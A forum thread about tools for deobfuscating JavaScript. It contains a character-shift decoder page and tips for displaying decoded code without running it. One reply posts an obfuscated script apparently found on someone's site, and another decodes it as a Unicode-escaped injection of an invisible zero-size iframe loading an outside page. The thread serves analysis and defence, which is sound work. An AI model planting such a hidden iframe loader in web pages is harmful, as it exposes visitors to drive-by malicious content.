I am looking for some level 2 JavaScript deobfuscation tools. I have no problems running the java.js script using Rhino or Caffeine Monkey. I would like to find some other tools and/or tutorials to help me deobfuscate the next level of JavaScript or .exe files. Reverse engineering tools would also be helpful. All software MUST be legal.
steve
Java Script Deobfuscation Tools
Started by
sjchansky
, Mar 04 2008 12:46 PM
3 replies to this topic
#1
Posted 04 March 2008 - 12:46 PM
#2
Posted 04 March 2008 - 01:54 PM
<html>
<head>
<script language="JavaScript">
<!--
/**
 * Undo the sample "encryption": every UTF-16 code unit of the input is moved
 * down by one, and a code unit of 0 becomes 255.
 *
 * This is a fixed shift with no key, so it only obscures the text; anyone
 * holding the page can reverse it with this same loop.
 *
 * @param {string} sBody - encoded text
 * @returns {string} decoded text, same length as the input
 */
function decrypt(sBody)
{
    var aPieces = [];
    var iPos = 0;
    while (iPos < sBody.length)
    {
        var iCode = sBody.charCodeAt(iPos);
        // 0 has no predecessor, so the original scheme maps it to 255.
        aPieces.push(String.fromCharCode(iCode > 0 ? iCode - 1 : 255));
        iPos++;
    }
    return aPieces.join('');
}
/**
 * onload handler: reads the encoded payload from the first child node of
 * <body>, decodes it with decrypt() and replaces the current document with
 * the result.
 *
 * The payload is taken from firstChild.data, so it has to sit in the body's
 * first node. Everything decrypt() returns is handed to document.write() and
 * parsed as HTML, so any script in the decoded text runs in this page. To
 * inspect a sample without running it, show the decoded string as text
 * instead of writing it into the document.
 */
function decode()
{
    var oBody = document.getElementsByTagName('body')[0];
    var sCoded = oBody.firstChild.data;
    // The payload is read before open(), which discards the current document.
    document.open();
    document.write(decrypt(sCoded));
    document.close();
}
//-->
</script>
</head>
<body onload="decode();">
<!-- Place the encrypted document here -->
</body>
</html>
Also:
http://code.gosu.pl/.../JsDecoder.html
http://hype-free.blo...javascript.html
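There are a couple more methods that my sleepy brain cannot remember right now, but here is the approximate idea:
document.write the code into a popup window, or use alert() instead of eval() or document.write() so the decoded text is displayed rather than executed (the surrounding script still runs, so do this in a throwaway browser profile or VM), or do something like this: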
document .write("<a>");
<exploit code>
САМО СЛОГА СРБИНА СПАСАВА
#3
Posted 20 January 2011 - 07:22 AM
extreme, can you tell me what obfuscation method is used in this code?
<script type="text/javascript">document.write('\u003C\u0049\u0046\u0052\u0041\u004D\u0045\u0020\u006E\u0061\u006D\u0065\u003D\u0022\u0078\u0022\u0020\u0073\u0072\u0063\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0076\u0061\u006E\u0073\u0066\u006F\u0072\u0073\u0061\u006C\u0065\u0069\u006E\u0065\u0073\u0073\u0065\u0078\u002E\u0063\u006F\u002E\u0075\u006B\u002F\u006D\u0065\u0064\u0069\u0061\u002F\u006E\u0065\u0077\u002E\u0068\u0074\u006D\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003D\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0030\u0022\u0020\u0073\u0063\u0072\u006F\u006C\u006C\u0069\u006E\u0067\u003D\u0022\u006E\u006F\u0022\u0020\u0066\u0072\u0061\u006D\u0065\u0062\u006F\u0072\u0064\u0065\u0072\u003D\u0022\u0030\u0022\u0020\u006D\u0061\u0072\u0067\u0069\u006E\u0077\u0069\u0064\u0074\u0068\u003D\u0022\u0031\u0022\u0020\u006D\u0061\u0072\u0067\u0069\u006E\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0031\u0022\u003E\u003C\u002F\u0049\u0046\u0052\u0041\u004D\u0045\u003E');</script>#4
Posted 20 January 2011 - 01:09 PM
That looks like plain hex: each \uXXXX is a JavaScript Unicode escape, and its four hex digits are the character code.
3C = <
49 = i
46= f
52= r
41= a
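So that should be an iframe in your site (the decoded attributes set width="0" and height="0", so it is invisible to visitors),
and simply replacing the document.write with an alert will show you the decoded markup as text instead of adding the iframe to the page.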
3C = <
49 = i
46= f
52= r
41= a
So that should be an iframe in your site.
and simply replacing the document.write with an alert will get you what that is
<script type="text/javascript">alert('\u003C\u0049\u0046\u0052\u0041\u004D\u0045\u0020\u006E\u0061\u006D\u0065\u003D\u0022\u0078\u0022\u0020\u0073\u0072\u0063\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0076\u0061\u006E\u0073\u0066\u006F\u0072\u0073\u0061\u006C\u0065\u0069\u006E\u0065\u0073\u0073\u0065\u0078\u002E\u0063\u006F\u002E\u0075\u006B\u002F\u006D\u0065\u0064\u0069\u0061\u002F\u006E\u0065\u0077\u002E\u0068\u0074\u006D\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003D\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0030\u0022\u0020\u0073\u0063\u0072\u006F\u006C\u006C\u0069\u006E\u0067\u003D\u0022\u006E\u006F\u0022\u0020\u0066\u0072\u0061\u006D\u0065\u0062\u006F\u0072\u0064\u0065\u0072\u003D\u0022\u0030\u0022\u0020\u006D\u0061\u0072\u0067\u0069\u006E\u0077\u0069\u0064\u0074\u0068\u003D\u0022\u0031\u0022\u0020\u006D\u0061\u0072\u0067\u0069\u006E\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0031\u0022\u003E\u003C\u002F\u0049\u0046\u0052\u0041\u004D\u0045\u003E');</script>












